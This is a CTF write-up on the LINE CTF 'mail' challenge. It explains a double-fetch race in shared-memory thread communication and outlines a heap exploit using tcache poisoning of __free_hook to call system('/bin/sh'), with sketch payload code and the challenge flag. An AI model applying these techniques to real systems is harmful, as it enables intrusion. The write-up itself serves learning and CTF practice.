My mailbox is empty now, send me a mail!

nc 34.146.156.91 10004 (Solves: 8, 305 pts)

Environment: Ubuntu20.04 dcfba5b03622f31b1d0673c3f5f14181012b46199abca3ba4af6c1433f03ffd9 /lib/x86_64-linux-gnu/libc-2.31.so



Started playing CTFs again with WreckTheLine and played LINE CTF this weekend. I think we did pretty well finishing at 8th! The challenges written for this CTF were really good quality as well so kudos to the authors, a Saturday well spent imo.

I managed to solve two challenges, trust code (pwn, warmup) and mail (pwn), both of which were pretty cool.

Overview

For this challenge, we are presented with a binary mail and the C++ source code for the binary. After some reversing/code reading, the general idea of the binary is as follows.

The binary forks into two threads, the service thread and manager thread.

The service thread is in charge of user-input.

    void service_menu(Service *srv)
    {
        ...
        while (!srv->ServiceDone())
        {
            ...
            std::cin >> menu_num;
            ...
            switch (menu_num)
            {
            case CREATE_ACCOUNT:
                srv->SendCreateAccount();
                break;
            case LOGIN_ACCOUNT:
                srv->SendLoginAccount();
                break;
            case SEND_MESSAGE:
                srv->SendMessage();
                break;
            case INBOX:
                srv->SendInbox();
                break;
            case DELETE_MESSAGE:
                srv->SendDeleteMessage();
                break;
            case LOGOUT_ACCOUNT:
                srv->Logout();
                break;
            case TURN_OFF:
                srv->turnOff();
                break;
            default:
                return;
            }
        }
    }

The manager thread communicates with the service thread and handles the “back-end” of the operations requested by the user.

    void manage_menu(Manage *mgr)
    {
        ...
        while (!mgr->ServiceDone())
        {
            switch (mgr->getCmd())
            {
            case CREATE_ACCOUNT:
                mgr->ReceiveCreateAccount();
                break;
            case LOGIN_ACCOUNT:
                mgr->ReceiveLoginAccount();
                break;
            case SEND_MESSAGE:
                mgr->ReceiveSendMessage();
                break;
            case INBOX:
                mgr->ReceiveInbox();
                break;
            case DELETE_MESSAGE:
                mgr->ReceiveSendDeleteMessage();
                break;
            default:
                break;
            }
            usleep(100);
        }
    }

In order to communicate between the two threads, there is a shared memory region allocated.

    void Memory::createShMemory()
    {
        shmId = shmget(keyId, 0x1000, 0666 | IPC_CREAT);
        ...
        memory = shmat(shmId, (void *)0, 0);
        ...
        bzero(memory, 0x1000);
    }

This shared memory region can be written to / read from by both threads, and thus both threads can communicate quite efficiently. This style of inter-thread communication is similar to what you might see in kernel-hardware communication (MMIO).



The general idea is that one thread will write to a specific offset/variable in the shared memory, while the other thread will poll this variable repeatedly till it notices a change. Upon a change that demands some action, the thread will read the value changed and start to do its own processing. This is illustrated in the diagram below.

thread A passing the variable length to thread B


This form of inter-thread communication is quite interesting and can lead to cool bugs (as we’ll see soon).
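To make the polling idea concrete, here is a minimal sketch of one thread handing a length to another through a flag. It is not the challenge's code: the `Mailbox` struct, `poll_for_length` and `pass_length` are hypothetical names, and I use `std::atomic` fields instead of the plain fields in a System V shared memory segment that the binary uses.

```cpp
#include <atomic>
#include <cassert>
#include <chrono>
#include <cstdint>
#include <thread>

// Hypothetical stand-in for the shared region: one payload field plus a flag.
struct Mailbox {
    std::atomic<uint64_t> length{0};
    std::atomic<bool> ready{false};
};

// Thread B: poll the flag until thread A publishes a value, then read it.
uint64_t poll_for_length(Mailbox &box) {
    while (!box.ready.load(std::memory_order_acquire)) {
        std::this_thread::sleep_for(std::chrono::microseconds(100));
    }
    return box.length.load(std::memory_order_relaxed);
}

// Thread A: write the value, then raise the flag. Returns what B observed.
uint64_t pass_length(uint64_t value) {
    Mailbox box;
    uint64_t seen = 0;
    std::thread consumer([&] { seen = poll_for_length(box); });
    box.length.store(value, std::memory_order_relaxed);
    box.ready.store(true, std::memory_order_release);
    consumer.join();
    return seen;
}
```

Calling `pass_length(42)` spins up the polling side, publishes 42, and returns whatever the poller read. The release/acquire pair on the flag is my own choice to keep the sketch well-defined in C++; the original relies on `usleep` polling over raw shared memory.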

Looking for bugs

While looking through the code for the manager (manage.cpp), we can see that most functions interact very frequently with the shared memory.

After some scrutiny, I noticed that there are many double fetches occurring! One example is shown below.

    void Manage::ReceiveCreateAccount()
    {
        char *accountId = NULL;
        uint64_t size = 0;
        if (getCmd() == CREATE_ACCOUNT)
        {
            // [1] Fetch once
            if (memory->accountIdSize > ACCOUNT_ID_MAXLEN)
            {
                error();
                return;
            }
            usleep(100);
            accountId = new char[ACCOUNT_ID_MAXLEN + 1];
            ...
            // [2] Fetch twice
            memcpy(accountId, memory->accountId, memory->accountIdSize);
            ...
        }
    }

What is a double fetch?

Notice at [1] in the code above, we are fetching the ->accountIdSize field from the shared memory and bounds checking it against ACCOUNT_ID_MAXLEN.

This is to ensure that ->accountIdSize is a reasonable length and won’t cause an overflow.

However, when we use that variable later to perform a memcpy operation, the memory->accountIdSize is fetched again [2]!

This might seem ok in normal programming contexts, but not for multi-threaded programming with shared memory :o

Between the time ->accountIdSize is checked [1], and the time it is used [2], its value could be changed by the other thread!

Furthermore, the usleep(100) call between [1] and [2] increases this race condition window.
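Here is a small, deterministic sketch of the check/use gap, assuming a made-up limit `kMaxLen` and a hypothetical `Window` callback that stands in for "the other thread gets to run during the sleep". It also shows the usual fix of fetching the size once into a local. None of these names come from the challenge source.

```cpp
#include <cassert>
#include <cstdint>
#include <functional>

constexpr uint64_t kMaxLen = 16;  // stand-in for ACCOUNT_ID_MAXLEN (value assumed)

struct Shared {
    volatile uint64_t size;  // can be rewritten by the other side at any time
};

// Models the other thread running inside the usleep() window.
using Window = std::function<void(Shared &)>;

// Vulnerable shape: the size is read from shared memory twice.
// Returns the length that would be handed to memcpy (0 if rejected).
uint64_t length_double_fetch(Shared &shm, const Window &window) {
    if (shm.size > kMaxLen) return 0;  // [1] check
    window(shm);                       // race window
    return shm.size;                   // [2] use: fetched again
}

// Safer shape: fetch once into a local, then check and use the local.
uint64_t length_single_fetch(Shared &shm, const Window &window) {
    const uint64_t size = shm.size;    // single fetch
    if (size > kMaxLen) return 0;
    window(shm);                       // later writes no longer matter
    return size;
}
```

If the window callback rewrites `size` from 10 to 10000, `length_double_fetch` hands back 10000 even though the check passed, while `length_single_fetch` still returns the 10 that was validated.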



The following diagram tries to illustrate this TOCTOU race condition.

Double Fetch TOCTOU Illustration


Clearly, this vulnerability could lead to a bad overflow in memcpy. How can we exploit this?

Exploit hunting

While this vulnerability is present in almost every functionality of the manager thread, it is not immediately exploitable.

The main pre-condition we must fulfill is that the service thread must be able to rewrite the values in the shared memory while the manager is still undergoing its operations. However, this is not as simple as we think.

For most functionalities, the service thread is made to sleep until the manager thread signals that it has completed the operation. This prevents exploitation of the double fetch vulnerability even though it is present.

Here is an example in the CreateAccount functionality.

    // service.cpp
    void Service::SendCreateAccount()
    {
        // Send request to manager thread
        ...
        // SLEEP while waiting for manager thread to respond
        while ((memory->isCreateAccountSendedDone == false) && (memory->error == false))
            usleep(100);
        memory->isCreateAccountSendedDone = false;
        // Allow service thread to continue
    }
    ...
    // manage.cpp
    void Manage::ReceiveCreateAccount()
    {
        ...
        if (getCmd() == CREATE_ACCOUNT)
        {
            // Manager does its stuff
            ...
            // Inform service thread to wake up
            memory->isCreateAccountSendedDone = true;
        }
    }

As we can see here, because the service thread waits on ->isCreateAccountSendedDone to be set to true by the manager thread, it will not continue operating.

With this, the user is not able to send a second command to change the value of the shared memory and exploit the double fetch.

Is all hope lost?

At present, we’ve identified the double fetch vulnerability, but the coding pattern of waiting on the manager thread is ruining our exploitation hopes >:(

Unless?

After some more code reading, we can stumble upon the SendMessage functionality!

    // manage.cpp
    void Manage::ReceiveSendMessage()
    {
        struct mail_message *mmsg = NULL;
        char *message = NULL, *to = NULL;
        uint64_t size = 0;
        if (getCmd() == SEND_MESSAGE)
        {
            // Do some stuff
            ...
            // [1] Inform service thread to wake up (!!)
            memory->isSendMessageSendedDone = true;
            // [2] Fetch one (check)
            if (memory->messageSize > MESSAGE_MAXLEN)
            {
                error();
                return;
            }
            // [3] Sleep (yay!)
            usleep(100);
            ...
            // [4] Fetch two (use)
            memcpy(message, memory->message, memory->messageSize);
            ...
        }
    }

What's different with this functionality is at [1].

Notice that before the manager has completed its operations, it has already told the service thread to wake up by setting the ->isSendMessageSendedDone flag to true.

This premature wake-up lets us, the user, send another command to the service thread that can change the value of memory->messageSize between [2] and [4]!

Even better, our race window is increased by the usleep() [3].

With this, we’ve found the perfect conditions for exploitation :D

In summary, to exploit the double fetch:

    (service) Service::SendMessage()
                |_ memory->messageSize = SAFE_SIZE (10)
    (manager) Manage::ReceiveSendMessage()
                |_ memory->isSendMessageSendedDone = true;
    (service)   |_ Service::SendMessage returns
    (manager)   |_ if (memory->messageSize > MESSAGE_MAXLEN), FALSE
                |_ usleep(100)
    (service) Service::SendMessage(), 2nd call
                |_ memory->messageSize = BIG_SIZE (10000)
    (manager)   |_ memcpy(message, memory->message, memory->messageSize);
                |_ OVERFLOW!

As the trace above (hopefully) shows, we need to race the manager thread by calling Service::SendMessage twice before a single Manage::ReceiveSendMessage call completes.

If we win the race, we get a powerful heap overflow primitive, which is all we need to pop a shell!
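The difference between the "wake up late" pattern (CreateAccount) and the "wake up early" pattern (SendMessage) can be replayed in a single-threaded model of the trace above. This is only a sketch: the `Shared` struct, the function names and the value of `kMessageMaxLen` are my assumptions, and real threads are replaced by a fixed step order so the outcome is deterministic.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint64_t kMessageMaxLen = 0x400;  // assumed value for MESSAGE_MAXLEN

struct Shared {
    uint64_t messageSize = 0;
    bool done = false;  // stand-in for isSendMessageSendedDone
};

// Service side: a second SendMessage can only run once the service was woken.
void service_second_send(Shared &shm, uint64_t size) {
    if (shm.done) shm.messageSize = size;
}

// Manager side, replayed in the order of the trace above.
// Returns the length that would reach memcpy (0 if the check rejects it).
uint64_t manager_receive(Shared &shm, bool ack_before_copy, uint64_t second_size) {
    if (ack_before_copy) shm.done = true;            // early wake-up (SendMessage)
    if (shm.messageSize > kMessageMaxLen) return 0;  // check
    service_second_send(shm, second_size);           // what can happen during usleep(100)
    const uint64_t used = shm.messageSize;           // use (second fetch)
    if (!ack_before_copy) shm.done = true;           // late wake-up (CreateAccount style)
    return used;
}
```

With `messageSize` starting at 10 and a second send of 10000, the early wake-up variant returns 10000 and the late one returns 10. In the real binary this ordering is not guaranteed, so the exploit has to win the race rather than rely on it.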

Wrapping it up 🎁

I’m personally not too interested in this part of the exploit process so I’ll go through it briefly. After getting the heap overflow primitive, we’ll have to perform some heap shaping/tricks to turn the bug into a full RCE.

Libc leak

- Heap shape to land the struct mail_message object at a higher heap address than the chunk to overflow

    // Heap layout
    [message (char[0x400])]
    ...
    [struct mail_message]

- Overflow message into the mail_message structure to overwrite mail_message.message with a GOT address

- Using the Inbox functionality, we can leak a libc address by reading mail_message.message
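Turning the leaked pointer into usable addresses is plain arithmetic. The helper names below are hypothetical, and the symbol offsets have to be looked up in the provided libc-2.31.so, so I do not hard-code any here.

```cpp
#include <cassert>
#include <cstdint>

// Recover the libc load base from one leaked function pointer.
// symbol_offset is that symbol's offset inside the target libc, looked up offline.
uint64_t libc_base_from_leak(uint64_t leaked_addr, uint64_t symbol_offset) {
    const uint64_t base = leaked_addr - symbol_offset;
    // The load base is page aligned, so a wrong offset usually shows up here.
    assert((base & 0xfff) == 0 && "unexpected libc base alignment");
    return base;
}

// Rebase any other symbol (for example system or __free_hook) onto that base.
uint64_t resolve(uint64_t base, uint64_t symbol_offset) {
    return base + symbol_offset;
}
```

For example, with a made-up leak of 0x7f0000012340 and a made-up symbol offset of 0x12340, the base comes out as 0x7f0000000000, and every other libc address is that base plus its own offset.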

RIP control

- Clean up the heap from before to make things easier

- Create tcache objects of 0x410 size

- Heap shape to have the tcache head below the message to overflow

    // Heap layout
    [message (char[0x400])]
    ...
    [tcache head for 0x410 size]

- Overflow into tcache head to perform tcache poisoning

- We can poison the tcache to point to __free_hook

- A future allocation of 0x410 chunk size (message size) will be writing in the __free_hook!

- We can write __free_hook with system address

- Trigger free("/bin/sh\x00") by freeing a mail message with contents “/bin/sh\x00”

- Win!
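As a rough illustration of the overflow payload for the poisoning step (not the payload from my actual exploit), the sketch below lays out the bytes written from the start of the message buffer. It assumes the standard 64-bit glibc chunk layout, a freed 0x410 chunk sitting `gap` bytes past the end of the overflowed chunk, and no pointer mangling on the tcache next pointer, which I believe holds for libc 2.31. `build_poison_payload` and `gap` are hypothetical names.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr std::size_t kUserSize = 0x400;  // message buffer size from the layout above
constexpr uint64_t kChunkSize = 0x411;    // 0x410 chunk with the PREV_INUSE bit set

// Bytes to write starting at the message buffer. `gap` is the number of bytes
// between the end of the overflowed chunk and the victim chunk's header; this
// sketch fills them with 'A', a real exploit would have to preserve them.
std::vector<uint8_t> build_poison_payload(std::size_t gap, uint64_t target) {
    std::vector<uint8_t> out(kUserSize + gap + 3 * sizeof(uint64_t), 'A');
    // Victim chunk: prev_size, size (kept intact), then the tcache next pointer.
    const uint64_t fields[3] = {0, kChunkSize, target};
    std::memcpy(out.data() + kUserSize + gap, fields, sizeof(fields));
    return out;
}
```

With `gap` set to 0 the payload is 0x418 bytes long and the fake next pointer sits at offset 0x410. Once the poisoned entry is at the head of the 0x410 bin, a later allocation of that size returns the target address, as long as the bin's count still allows it, which is presumably why several 0x410 objects are freed first.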

Full exploit here.

LINECTF{An07hEr_Em41l_T0_7hE_Sh4red_1nb0x?}

Conclusion

Overall this challenge was really cool because I rarely see double fetch happening in CTF binaries. This is likely because CTF challenges tend to be single-threaded and userspace, but it’s awesome to see this challenge do something different from the norm.